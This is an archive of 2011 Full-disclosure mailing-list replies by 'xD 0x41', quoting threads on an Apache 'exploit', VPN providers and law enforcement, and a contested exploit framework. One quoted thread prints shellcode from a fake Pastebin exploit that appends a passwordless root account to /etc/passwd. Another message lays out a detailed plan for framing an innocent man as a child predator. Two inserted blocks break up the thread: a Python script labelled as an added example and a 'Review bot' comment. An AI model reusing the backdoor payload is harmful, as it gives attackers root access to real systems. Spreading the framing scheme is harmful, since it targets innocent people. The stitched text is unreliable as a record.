> > btw, are Anonymous affiliated/supporting the usa protests aka
> "OccupyWallStreet"?
> >
> > all the usa needs is a revolution just before they go bankrupt :)
> >
> > --
> > joro
>

Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread xD 0x41
There are ways to make it *say* things, like show system info etc on stdout,
without using that bug.. look up a decent connectback shell, most perl ones
have fine stdinout and use printf or other means..


On 5 October 2011 08:39, Kai  wrote:

>  Hi halfdog,
>
> > Just for those, who want to build their own apache shell code for
> > testing purposes, this snip might be of some use. It uses the still
> > open tcp connections to the server to spawn the shells, so that no
> > backconnect is needed. Of course, it does not give remote root but
> > only httpd user privs. And you should send "exec 1>&0" as first
> > command if you want to see remote shell stdout.
>
>  wasn't that bug fixed a long ago? https://bugs.php.net/bug.php?id=38915
>  ---> https://issues.apache.org/bugzilla/show_bug.cgi?id=46425
>  sorry if i'm talking about different thing.
>
> --
>  Cheers,
>
>  Kai
>

Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread xD 0x41
could be used as a very handy 'bind' shell tho...


On 5 October 2011 08:51, Andrew Farmer  wrote:

> On 2011-10-04, at 14:39, Kai wrote:
> > Hi halfdog,
> >
> >> Just for those, who want to build their own apache shell code for
> >> testing purposes, this snip might be of some use. It uses the still
> >> open tcp connections to the server to spawn the shells, so that no
> >> backconnect is needed. Of course, it does not give remote root but
> >> only httpd user privs. And you should send "exec 1>&0" as first
> >> command if you want to see remote shell stdout.
> >
> > wasn't that bug fixed a long ago? https://bugs.php.net/bug.php?id=38915
> > ---> https://issues.apache.org/bugzilla/show_bug.cgi?id=46425
> > sorry if i'm talking about different thing.
>
> It's a generic method of getting a shell set up once you have code
> execution, not an exploit for any specific bug.

Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread xD 0x41
haha very true but, still a very good/easy and, often used as example code,
but, yes most are assignments usually :s and, actually seen as a feature for
some people, who like , tend to forget passes rofl :P


On 5 October 2011 11:53,  wrote:

> On Wed, 05 Oct 2011 08:55:07 +1100, xD 0x41 said:
>
> > could be used a very handy 'bind' shell tho...
>
> I swear, bind shell code is like "Our Friend The Beaver" school essay
> assignments - everybody ends up writing one, they all look the same, and
> almost
> none are any good. ;)
>
>

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread xD 0x41
This is ONCE you are actually in front of the judge...remember, it may take
some breaking of civil liberty, for this to happen... or i may be wrong.
cheers
xd


On 5 October 2011 15:10, Laurelai  wrote:

>  On 10/4/2011 6:50 PM, adam wrote:
>
> "That actually depends on the situation, contempt can be criminal. And
> frankly if you refuse a court order for information like that, the LE
> officers will just seize it by gunpoint legally, then arrest you."
>
>  I'm curious as to what you think would cause contempt to be a criminal
> offense, especially in that example.
>
>  Secondly, without the appropriate warrant - they couldn't legally take
> anything. If they disregarded that truth and did so anyway, they'd open
> themselves up to a pretty big lawsuit for violating that individual's civil
> rights as well as due process. Not to mention, anything found would likely
> end up being inadmissible because it was obtained illegally.
>
> On Tue, Oct 4, 2011 at 10:39 PM, Laurelai  wrote:
>
>>   On 10/4/2011 6:35 PM, adam wrote:
>>
>> "(Option 3 - the guy heads downtown on a contempt of court charge -
>> happens so
>> rarely that it's basically a hypothetical)."
>>
>>  You do realize that (at least in the US) - contempt is *not* a criminal
>> offense, don't you?
>>
>> On Tue, Oct 4, 2011 at 8:05 PM,  wrote:
>>
>>> On Tue, 04 Oct 2011 03:15:02 EDT, Jeffrey Walton said:
>>> > On Tue, Oct 4, 2011 at 3:06 AM, Ferenc Kovacs 
>>> wrote:
>>>
>>>  > > As I mentioned before it is hard to expect that a VPN provider will
>>> > > risk his company for your $11.52/month, and maybe they would try it
>>> > > for some lesser case, but what Lulsec did was grant, so I'm not
>>> > > surprised that they bent.
>>> >
>>> > "Alleged"
>>>
>>>  Yes. So?  In most jurisdictions, "alleged" and "probable cause" is
>>> sufficient
>>> to get a court to sign off on a subpoena and/or warrants.
>>>
>>> "Dear Judge:  On Aug 23, a hacker using the handle "JustFellOutOfTree"
>>> did
>>> violate Section N, Clause X.Y of the criminal code by hacking into
>>> BigStore.com.  The connection was traced back to the provider VPNs-R-Us.
>>>  We
>>> would like a court order requesting VPNs-R-Us to provide any and all
>>> information they may have regarding this user".
>>>
>>> That will usually do it (after bulked up to about 3 pages with legalese
>>> and
>>> dotting the t's and crossing the i's).
>>>
>>> The next morning, the manager at VPNs-R-Us gets to his office, and finds
>>> two guys with guns and a signed piece of paper.  At which point one of
>>> two
>>> things will happen:
>>>
>>> 1) the guy rolls and gives up all the info.
>>> 2) the guy calls his lawyer and makes sure that he gives up all the
>>> required info,
>>> and not one byte more.
>>>
>>> (Option 3 - the guy heads downtown on a contempt of court charge -
>>> happens so
>>> rarely that it's basically a hypothetical).
>>>
>>>
>>   That actually depends on the situation, contempt can be criminal. And
>> frankly if you refuse a court order for information like that, the LE
>> officers will just seize it by gunpoint legally, then arrest you.
>>
>
>
> http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/crm00754.htm
>
> And they can hold you indefinitely until you comply, or use your lack of
> compliance as reasonable suspicion to get that warrant, oh and lets not
> forget that they are declaring kids cyber terrorists and then the patriot
> act takes effect in cases of suspicion of terrorism, when that happens you
> don't have any rights anymore. Realistically we should stop calling them
> rights since they aren't really rights, they are privileges that can be
> revoked at government convenience.
>
>

Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread xD 0x41
yer it is clearly leet stuff dude...
i ran it and got like 2000k2.2.* apache user bot  in a night! :P
hgehe (jkin)
funny tho.
xd


On 5 October 2011 13:09, VeNoMouS  wrote:

> char evil[] =
> "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47
> \x89"
> "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51
> \x89"
> "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80
> \xe8"
> "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63
> \x23"
> "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30
> \x74"
> "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65
> \x3a"
> "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73
> \x68"
> "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77
> \x64"
> "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44
> \x44"
> "\x44\x44"
> .
> execl("/bin/sh", "sh", "-c", evil, 0);
>
> .
>
>
>
> /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd
>
> AHUH.
>
>
>
> On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote:
>
> I regularly trawl Pastebin.com to find code - often idiots leave some 0day
> and similar there and it is nice to find.
>
> Well, seeing as I have no test boxes at the moment, can someone check this
> code in a VM? I am not sure if it is legit or not.
>
> http://pastebin.com/ygByEV2e
>
> Thanks :)
>
> ~Darren
>
>
>
>
>
>
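
Added example, not part of the original thread: a static triage in the spirit of the decode VeNoMouS posted above, which unescapes the string literals of an untrusted "exploit" source and reports the readable commands without compiling or running anything. The sample source, its `demo` account line, the filler bytes and the rule names are constructed for illustration.

```python
import re

# One C string literal, honouring backslash escapes inside it.
_LITERAL = re.compile(r'"((?:[^"\\\n]|\\.)*)"')
# One escape sequence: \xHH.., octal \ooo, or a single-character escape.
_ESCAPE = re.compile(r'\\(x[0-9a-fA-F]+|[0-7]{1,3}|.)', re.S)
_SIMPLE = {"n": "\n", "t": "\t", "r": "\r", "a": "\a", "b": "\b",
           "f": "\f", "v": "\v"}
# Same idea as strings(1): runs of at least four printable ASCII bytes.
_PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")

# Constructed rule set; names and patterns are assumptions for this example.
RULES = [
    ("appends to account database", re.compile(rb">>?\s*/etc/(passwd|shadow)")),
    ("passwd entry with UID 0 and empty password",
     re.compile(rb"[A-Za-z0-9_]+::0:0:")),
    ("spawns a shell", re.compile(rb"/bin/(ba)?sh\b")),
]


def _unescape(body):
    """Turn the inside of a C string literal into the bytes it denotes."""
    def repl(match):
        tok = match.group(1)
        if tok[0] == "x" and len(tok) > 1:
            return chr(int(tok[1:], 16) & 0xFF)
        if tok[0] in "01234567":
            return chr(int(tok, 8) & 0xFF)
        return _SIMPLE.get(tok, tok)
    return _ESCAPE.sub(repl, body).encode("latin-1", "replace")


def extract_buffers(source):
    """Return decoded buffers; adjacent literals are concatenated as in C.

    Simplification: comments and character literals are not parsed.
    """
    buffers, prev_end = [], None
    for match in _LITERAL.finditer(source):
        chunk = _unescape(match.group(1))
        if prev_end is not None and source[prev_end:match.start()].strip() == "":
            buffers[-1] += chunk
        else:
            buffers.append(chunk)
        prev_end = match.end()
    return buffers


def triage(source):
    """Return (rule name, readable string) pairs found in the literals."""
    findings = []
    for buf in extract_buffers(source):
        for run in _PRINTABLE.findall(buf):
            for name, pattern in RULES:
                if pattern.search(run):
                    findings.append((name, run.decode("ascii")))
    return findings


def to_c_literal(data, per_line=15):
    """Render bytes as wrapped \\xHH string literals, like a pasted PoC."""
    rows = [data[i:i + per_line] for i in range(0, len(data), per_line)]
    return "\n".join('"' + "".join("\\x%02x" % b for b in row) + '"'
                     for row in rows)


# Constructed sample: non-printable filler followed by a readable command.
SAMPLE_PAYLOAD = bytes.fromhex("909031c0cd80e8d1ffffff") + (
    b"/bin/sh#-c#/bin/echo demo::0:0:constructed:/root:/bin/bash"
    b" >> /etc/passwd#AAAABBBB")
SAMPLE_SOURCE = ("char evil[] =\n" + to_c_literal(SAMPLE_PAYLOAD) + ";\n"
                 'execl("/bin/sh", "sh", "-c", evil, 0);\n')

if __name__ == "__main__":
    for rule, text in triage(SAMPLE_SOURCE):
        print("[%s] %s" % (rule, text))
```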

Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread xD 0x41
(using an old account I must have set up a while ago named w000t).

err..but, you ran it didnt you... so why would u need any old account :P
hehe... just... something which i find strange.
I dont see any support would be good here :) lol i betting he does ONLY
patch to stop the thing being re-rooted, as it has become public since
posted onlist ;)
hehe you should really not let him do much, if thats even true, which i
really am doubting... specially since u named this old account...when, also
saying u tried to run it..which would, exec shellcode...so i guess.. once
cleared up, and if true, i know this is done by MANY smarter hax, and, your
IP if it was ran, prolly also gets emailed somewhere, somehow... or, some
alert made, or maybe, not.. but, if he was so fast to login then i wonder...
but, then, he is only stopping it, from other hackers, not from, other nice
guys :)
xd


On 5 October 2011 14:06, VeNoMouS  wrote:

>
> I dunno china offers usa that kind of support all the time . or so
> i heard
>
> On Tue, 4 Oct 2011 21:41:08 -0500, adam wrote:
>
> Wow, I'm extremely impressed with the support that the developer of this
> exploit offers. I had been trying to get the exploit to work for about an
> hour or so (couldn't get root on the target) and noticed that the developer
> of this exploit logged into my machine (using an old account I must have set
> up a while ago named w000t). I couldn't believe it when I saw that he was
> logging in to fix the problem, I've NEVER gotten that kind of support even
> out of paid software. He's been logged in for a couple of hours now, and
> I've noticed that he's downloaded/uploaded quite a bit (probably downloading
> the log files and then uploading patches) so I'm just gonna wait it out. I
> definitely have a good feeling about this though.
>
> On Tue, Oct 4, 2011 at 9:21 PM, xD 0x41  wrote:
>
>> yer it is clarly leet stuff dude...
>> i ran it and got liek 2000k2.2.* apache user bot  in a night!
>> :P
>> hgehe (jkin)
>> funny tho.
>> xd
>>
>>
>>  On 5 October 2011 13:09, VeNoMouS  wrote:
>>
>>>   char evil[] =
>>> "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46
>>> \x47\x89"
>>> "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e
>>> \x51\x89"
>>> "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd
>>> \x80\xe8"
>>> "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d
>>> \x63\x23"
>>> "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30
>>> \x30\x74"
>>> "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64
>>> \x65\x3a"
>>> "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61
>>> \x73\x68"
>>> "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73
>>> \x77\x64"
>>> "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43
>>> \x44\x44"
>>> "\x44\x44"
>>> .
>>> execl("/bin/sh", "sh", "-c", evil, 0);
>>>
>>> .
>>>
>>>
>>>
>>> /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd
>>>
>>> AHUH.
>>>
>>>
>>>
>>> On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote:
>>>
>>> I regularly trawl Pastebin.com to find code - often idiots leave some
>>> 0day and similar there and it is nice to find.
>>>
>>> Well, seeing as I have no test boxes at the moment, can someone check
>>> this code in a VM? I am not sure if it is legit or not.
>>>
>>> http://pastebin.com/ygByEV2e
>>>
>>> Thanks :)
>>>
>>> ~Darren
>>>
>>>
>>>

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread xD 0x41
I still think press drives many and more takedowns, and bends the arms of
others too.. for sure.
I know of a case here of petty crime, but is relevant ok, the guy had many
many, and big charges of murder,manslaughter, in other states within
australia, but was asked for his name, in 'vic' , which (about 10yrs ago -
pre babybrother to usa) , draconian like laws enabled police to yes, put ppl
in jail for this.
So, he took the temporary jail, and monthly, would b brought b4 the judge,
and asked again every time for the name/address so his infos could be checked.
each time he would return... waiting for laws to change.
eventually, they just had no room, and threw him out with a slap on wrist
fine... then later, they could not do crap about his murder etc, and he is
still free to this day, simply by doing a little bit of that time, and, not
taking the *definite 15+* :P
Smart, and only would happen NON usa, but yes, USA and USA press has TOO
much power in court, altho online, I think the press if it gets involved* it
is always seen as big, because since when is ITsec involved?only when you
hear of mass fraud...etc... so, any case would become classed as "oh must be
fraud or sumthin BIG for them to get arrested..."... is indeed fact... but,
it does take sometimes the press, or others, to simply expose it.
many cases are, self explanatory but, some cases are really interesting...
although, laws change so much in usa, it is scarier than the other scary bits
;p
cheers,
xd


On 5 October 2011 13:52, adam  wrote:

> >>Its frightening how much power judges have, and how poorly they
> are overseen.
>
> Definitely agree there. Some of the civil cases are disgustingly bad, due
> to there being no media attention and no real oversight. The civil case
> mentioned above is a good example, and all of the excessive child support
> orders even further that.
>
> On topic: I haven't read every single reply here, but from what I've seen:
> no one has mentioned the VPN provider being held personally responsible.
> Being that the attacks originated from machines they own, if they failed to
> turn over user information, could it really be that difficult to pin the
> attacks on them and convince a judge that they were responsible?
>
> On Tue, Oct 4, 2011 at 9:37 PM, Jeffrey Walton  wrote:
>
>> On Tue, Oct 4, 2011 at 10:32 PM, adam  wrote:
>> >>>
>> http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/crm00754.htm
>> > Did you actually read the link you pasted?
>> > [...] and "criminal penalties may not be imposed on someone who has not
>> been
>> > afforded the protections that the Constitution requires of such criminal
>> > proceedings [...] protections include the right [..]
>> > Then take a look at the actual rights being referenced. Most of which
>> would
>> > be violated as a result.
>> > In response to 0x41 "This is ONCE you are actually in front, of the
>> > judge...remember, it may take some breaking of civil liberty, for this
>> to
>> > happen... "
>> > No, you're absolutely right. That's the point here. Contempt is attached
>> to
>> > the previous court order, there wouldn't be a new judge/new case for the
>> > contempt charge alone. All of it is circumstantial anyway, especially
>> due to
>> > how much power judges actually have (in both criminal AND civil
>> > proceedings).
>> Its frightening how much power judges have, and how poorly they are
>> overseen. Confer: Judge James Ware, US 9th Circuit Court (this is not
>> a local judge in a hillbilly town).
>>
>> Jeff
>>
>
>

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread xD 0x41
hmm.. yes interesting..

On the flip side would it be that hard for a malicious person who works at a
VPN provider to blame it on a customer? I don't think that's what has
happened in this case, but hypothetically what is to stop a rogue employee
from abusing the trust that a LE official might have and doctoring logs sent
to them?

Absolutely nothing :)
This is where, as i was saying... a shell owner/employee, could easily make
any police run in circles simply trying to get a decent tap on something...
this is where it gets cloudy... but, this is what is being questioned on
this thread too...
I guess we have gotten somewhere.
A. Do NOT use VPN and shell services, to commit crime
B. Do NOT commit crimes, in USA, especially those of a large-scale cyber
nature, and
C. I apparently am laurelai and, i like popcorn (both are false)
Cheers!
xd


On 5 October 2011 14:30, adam  wrote:

> That raises a good question: could a good enough defense attorney convey
> that point to a judge well enough to get the charges dismissed? Then again,
> if they really believed a VPN service would protect them (even while
> violating their agreement with said provider) - there's probably at least
> *some* evidence on their machine implicating them. In the event that
> there's not though, I do wonder how it would play out.
>
> It'd make for a relatively easy set-up, if that were to work the way you
> suggested. You could doctor all of the logs to implicate them, and even go
> as far as to use the same software/configuration that they use. No matter
> how true their "I have no idea what you're talking about" actually is, the
> logs plus added "evidence" could likely be enough.
>
> That entire thing reminds me of something I thought about after watching
> "to catch a predator" a couple of times. You'll notice that in most cases,
> the "predators" respond the same way: they play stupid, pretend not to know
> what's going on, etc. Imagine if you knew someone in real life that worked
> at a pizza delivery place. Now also imagine that you hated said person.
>
> The "undercovers" on that show are all pretty predictable, and some of the
> tactics they use are present in every single bust. Keeping that in mind, and
> with enough research, you could easily find one of their undercovers online.
> Now imagine starting a dialogue with one of them, pretending to be the
> person who works at a pizza place (for sake of simplicity, we'll call him
> Mike). Imagine sending pictures of Mike to the undercover, talking about
> having sex with her, sending her nude pictures of "you" or other people, and
> so on.
>
> Then wait for one day that you know Mike person is working (and that you
> know undercover would be willing to meet). Figuring out the former would be
> a simple call to the pizza place "Hey [name], do you know what time Mike
> comes in today?" From there, you could tell the undercover that you'll come
> in your pizza delivery car so that no one suspects anything, so that
> she recognizes you, whatever - and tell her that you'll bring a pizza (maybe
> even go as far as to figure out her favorite kind for added "evidence").
>
> During the day, lots of pizza places only have one or two drivers present.
> You could sit outside the pizza place and wait for [other driver] to leave
> and Mike to arrive (or do something to cause [other driver] not to make it
> back to the pizza place, e.g. slashing one of his tires on a fake delivery).
> There's lots of different ideas that could be implemented, as long as the
> end result is that you can guarantee Mike will be delivering the pizza. At
> which point, you call and request a delivery to undercover's house. Mike
> shows up there, undercover invites him inside and asks him to sit down - and
> at that point, Chris Hansen comes walking out. Even though everything Mike
> would say is indeed true, it'd sound like BS if we believed he had been
> talking to the undercover for a couple of months. He'd "play stupid" and
> would be charged with felony offenses of trying to entice a child/yada yada.
>
> In that situation, even if he could somehow come up with proof that he was
> set up - no one's gonna believe a pervert. It's just something that I've
> thought about a lot, and I wonder how many others have as well (and I
> especially wonder if anyone has ever attempted it).
>
>
> On Wed, Oct 5, 2011 at 12:06 AM, Laurelai  wrote:
>
>>  On 10/4/2011 7:52 PM, adam wrote:
>>
>> >>Its frightening how much power judges have, and how poorly they
>> are overseen.
>>
>>  Definitely agree there. Some of the civil cases are disgustingly bad,
>> due to there being no media attention and no real oversight. The civil case
>> mentioned above is a good example, and all of the excessive child support
>> orders even further that.
>>
>>  On topic: I haven't read every single reply here, but from what I've
>> seen: no one has mentioned the VPN provider being held personally
>> responsible. Being that the attacks originated from machines

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread xD 0x41
Oh for sure, if it was not for these people really, none of those crimes
which really did annoy us, would have happened.
So, i am all for them. and what their agenda is.
i guess, you just do not abuse things, and expect to be getting away with
it..



On 5 October 2011 14:34, adam  wrote:

> >>Amen to that.  They're not perfect, but the ACLU and EFF are
> probably among our best bets during these times.
>
> Agreed. I know the ACLU gets a lot of flack for stepping on peoples' toes,
> but no matter what their *alleged* agenda is - they've done a whole lot of
> good that would have otherwise never existed. Same with the EFF. It gives,
> even if only a tiny amount, some hope in situations where you'd otherwise be
> completely helpless.
>
> On Tue, Oct 4, 2011 at 10:26 PM,  wrote:
>
>> On Tue, 04 Oct 2011 22:04:40 CDT, adam said:
>>
>> > >>"Good point Jeff, the real question is what does one do to fix it?"
>> >
>> > http://www.google.com/search?q=related:www.aclu.org
>>
>> Amen to that.  They're not perfect, but the ACLU and EFF are probably
>> among our best bets during these times.
>>
>
>

Re: [Full-disclosure] Strange Lenovo x121e

2011-10-05 Thread xD 0x41
Looks like a pre used box... specially with that name, am assuming THINK
(thinkcentre/thinkpad - ibm) so in there it might be preused IBM/Lenovo, but
strange those files..should never be on the hd on a clean sale.


On 6 October 2011 06:57, halfdog  wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> Hello List,
>
> I just purchased a Lenovo x121e and just before init with random data
> and setting up the crypto disks, I found that the disk was not
> completely clean. It seems that
>
> a) X121 ships with a dirty disk or
> b) machine was used before purchase
>
> After reconstruction of bootsector, a NTFS partition is readable,
> pagefile.sys shows
>  COMPUTERNAME=ADMIN-THINK
>
> Newest files in /
> dr-x--  1 root root  28672 May 29 09:45 SWDL
> - -r  2 root root   2490 May 29 09:36 ExitWinXP.bat
> dr-x--  1 root root   4096 Apr  6 13:59 WWAN1
> dr-x--  1 root root  0 Mar  1  2011 Temp
> dr-x--  1 root root  0 Jan  6  2011 $Recycle.Bin
> dr-x--  1 root root   4096 Jan  6  2011 Users
> dr-x--  1 root root  0 Jan  6  2011 Intel
> - -r  2 root root   1959 Oct  2  2010 bluetooth.txt
>
> Funny: Might also be infected with virus, that generated sal.xls.exe
>
> - -r  2 root root   4810 Oct 13  2007
> \346\270\205\351\231\244sal.xls.exe\347\227\205\346\257\222.bat
>
> The non-printables seem to be UTF-8 and display as Chinese glyphs on
> other machine.
>
> I'm complete noob in win-forensics, but at least it seems, that there
> is no evidence for other user accounts, Documents & Settings empty, so
> perhaps this could really be an authentic IBM OEM image (with virus),
> but they just replaced the boot sector to get rid of the partitions?
>
> Since I don't want to waste too much time on dirty hardware, I did
> some googling, but found nothing of value.
>
>
> Does someone know of similar findings on Lenovo machines and what's
> your guess: is it worth to dig in deeper or is it just waste of time
> to recover OEM-Windows image, that was deflowered and insufficiently
> cleaned by some Chinese factory worker during lunch hours?
>
> hd
>
> - --
> http://www.halfdog.net/
> PGP: 156A AE98 B91F 0114 FE88  2BD8 C459 9386 feed a bee
>
>

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-05 Thread xD 0x41
Really, at this stage yes, you're right, at this moment with the legal ways as
they are, then for sure it is as you say..

this can be said another way: don't be stupid :)

This seems to be a general consensus I see.. I guess this is fd..cheers.
xd


On 5 October 2011 16:26, coderman  wrote:

> On Tue, Oct 4, 2011 at 9:04 PM, xD 0x41  wrote:
> > ...
> > This is where, as i was saying... a shell owner/employee, could easily
> make
> > any police run in circles simply trying to get a decent tap on
> something...
>
> yeah, then they just take whole provider, e.g.:
>
> "On Sept. 22nd, Microsoft filed for an ex parte temporary restraining
> order from the U.S. District Court for the Eastern District of
> Virginia against Dominique Alexander Piatti, dotFREE Group SRO and
> John Does 1-22. The court granted our request, allowing us to sever
> the known connections between the Kelihos botnet and the individual
> “zombie computers” under its control. Immediately following the
> takedown on Sept. 26th, we served Dominique Alexander Piatti, who was
> living and operating his business in the Czech Republic, and dotFREE
> Group SRO, with notice of the lawsuit and began discussions with Mr.
> Piatti to determine which of his subdomains were being used for
> legitimate business, "
>
>
> short of it is basic =
>  be a discerning customer.
> - vpn providers that don't log are better than logging for any period
> no matter how short.
> - vpn providers that are technically competent are better than those
> which will expose you through leaks or when cracked.
> - vpn providers resistant to jurisdictional and payment processor
> pressure are better than those using easily coerced services, third
> parties, or vendors.
> - no vpn provider is resistant to you being an ass. if you raise big
> heat directly and exclusively on a VPN provider you are both stupid
> and subject to them cutting your service if not dumping your logs.
> this can be said another way: don't be stupid :)
>
>
> the incompetent and twofaced should be exposed however. i hear
> attrition.org likes to keep lists and name names ...
>

Re: [Full-disclosure] New open source Security Framework

2011-10-05 Thread xD 0x41
wow i was not going to comment on that pack and have not yet looked but,
that's plain nasty... to remove a simple credit line, i mean it is not full
of greetz etc :s and replace... totally pathetic.



On 5 October 2011 20:32, root  wrote:

> - * @author Stefan Zeiger (szei...@novocode.com)
> - print "   Written by Blake  "
> - 
>
> +#Exploit Pack - Security Framework for Exploit Developers
> +#Copyright 2011 Juan Sacco http://exploitpack.com
> +#
> +#This program is free software: you can redistribute it and/or modify
> it under the terms of the
> +#GNU General Public License as published by the Free Software
> Foundation, either version 3
> +#or any later version.
> +#
> +#This program is distributed in the hope that it will be useful, but
> WITHOUT ANY WARRANTY;
> +#without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
> PARTICULAR
> +#PURPOSE. See the GNU General Public License for more details.
> +#
> +#You should have received a copy of the GNU General Public License
> along with this program.
> +#If not, see http://www.gnu.org/licenses/
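Review bot: the three removed lines are the only author credits shown ("@author Stefan Zeiger" and "Written by Blake"), and the added header puts "Copyright 2011 Juan Sacco" in their place, so the original authorship is lost from the file. Suggest keeping the existing author lines and adding the GPL header above them rather than instead of them, and applying the new notice only to files whose original licence allows redistribution under GPL version 3.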
>
>
>
> Ys why not?
>

Re: [Full-disclosure] New open source Security Framework

2011-10-05 Thread xD 0x41
You will inmediately recieve $2 (US Dollars) in your PayPal account for
each approved exploit.


This is IT dream, 2bux for one 0day or, 100 = 200bux :P dang nabbit that's
just too good an offer!
what is sad, some people will actually 'do it'
until they maybe find some people selling one 0day, for say 3000.hehe...
that's very much taking advantage...nasty pack not exploitpack...made by
others' losses.



On 5 October 2011 20:49, root  wrote:

> Wait there is more:
>
>
>
> http://exploitpack.com/faq
>
> How can I earn money by migrating exploits?
> You will inmediately recieve $2 (US Dollars) in your PayPal account for
> each approved exploit.
>
>
>
> Juan Sacco, infosec needs people like you. You make me happy, Juan.
>
> Thank you.
>
>
>
> On 10/04/2011 12:42 PM, nore...@exploitpack.com wrote:
> > Exploit Pack is an open source security framework developed by Juan
> > Sacco. It combines the benefits of a
> > JAVA GUI, Python as Engine and well-known exploits made by users. It
> > has a module editor to make the task of
> > developing new exploits easier, Instant Search and XML-based modules.
> >
> > This open source project comes to fill a need, a high quality framework
> > for exploits and security researchers
> > with a GPL license and Python as engine for its modules.
> >
> > GPL license to ensure the code will always be free
> > Instant search built-in for modules easy access
> > Module editor that allows the user to create custom exploits
> > Modules use XML DOM, really easy to modify
> > Python as Engine because its the language more used on security related
> > programming
> >
> > We are actually working with social code network, to participate in
> > this project you will only need a GitHub
> > account.
> >
> > Also, I am looking for financial support to keep me coding. If you want
> > to be part of this open source project
> > or just want to collaborate with me:
> >
> > Please reply to jsa...@exploitpack.com
> >
> > Why don’t you download and give it a try right now? While downloading,
> > you may watch this quick video on YouTube!
> >
> > Video: http://www.youtube.com/watch?v=cMa2OrB7b5A
> > Website: http://www.exploitpack.com
> >

Re: [Full-disclosure] New open source Security Framework

2011-10-05 Thread xD 0x41
Out of interest, I was considering asking - what is all your opinions on
using Metasploit (via RPC) as the "shell handler" in an exploitation
framework? I was considering writing a fork of Fimap that used one.

Well here, i can say, I have recoded their whole fingerprinter for rpc/smb
and it r0x. In windows, is worth doing 10x. Awesome handler for exploiting,
and the updated ones look even better... although, i am mainly using a cpp
fork of their rpc-smb fingerprint host-attack... very very good.


On 6 October 2011 01:18, Darren Martyn wrote:

> When I saw this I too thought "Insect". Though still, I dont recall Insect
> having an exploit editor or ANY way to add modules (insect used a Metasploit
> install IIRC), but it DOES remind me (scarily) of CANVAS. Might check it out
> later.
>
> Out of interest, I was considering asking - what is all your opinions on
> using Metasploit (via RPC) as the "shell handler" in an exploitation
> framework? I was considering writing a fork of Fimap that used one.
>
> On Wed, Oct 5, 2011 at 2:10 PM, Gage Bystrom wrote:
>
>> I grab a bag of popcorn whenever Juan sends an email.
>>
>> On Wed, Oct 5, 2011 at 4:25 AM,   wrote:
>> > On Wed, 05 Oct 2011 06:49:40 -0300, root said:
>> >> How can I earn money by migrating exploits?
>> >> You will inmediately recieve $2 (US Dollars) in your PayPal account for
>> >> each approved exploit.
>> >
>> > At $2 per pop, you're going to see a lot of exploits that look like they
>> were
>> > mass-migrated by a Perl script, or by an 11 year old, because that's the
>> only two
>> > ways it makes economic sense for somebody to work for that pay rate.
>> >
>> > Man, is it too early in the morning to make popcorn?
>> >

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-05 Thread xD 0x41
Oh just on ThepirateBay thing, I am kind of laughing, look at this... and
this shows how easily they bypassed, and still have fine hosting it seems.

The Pirate Bay Adds Domain to Bypass Court Order -
http://feed.torrentfreak.com/~r/Torrentfreak/~3/ueTghMyUIbE/

You guys are right about that whole thing, i was thinking that they were
screwed until i saw this. RSS feeds are handy.


On 4 October 2011 18:06, Ferenc Kovacs  wrote:

> http://vpn.hidemyass.com/vpncontrol/legal.html
>
> "VPN Data
>
> What we store: Time stamp and IP address when you connect and
> disconnect to our service."
>
> ...
>
> "Legalities
>
> Anonymity services such as ours do not exist to hide people from
> illegal activity. We will cooperate with law enforcement agencies if
> it has become evident that your account has been used for illegal
> activities."
>
> people should read the TOC, AUP and privacy policy especially if they
> are planning to use that service for illegal activities.
>
> As I mentioned before it is hard to expect that a VPN provider will
> risk his company for your $11.52/month, and maybe they would try it
> for some lesser case, but what Lulsec did was grant, so I'm not
> surprised that they bent.
>
> On Tue, Oct 4, 2011 at 1:09 AM, xD 0x41  wrote:
> > maybe they are law abiding companies? :)
> >
> > Who were advertising themselves, and acting like they would NEVER do the
> > dirty by handing over any payment records etc... which is half the reason i
> > believe the people use those ones, advertising to protect you.. not to give
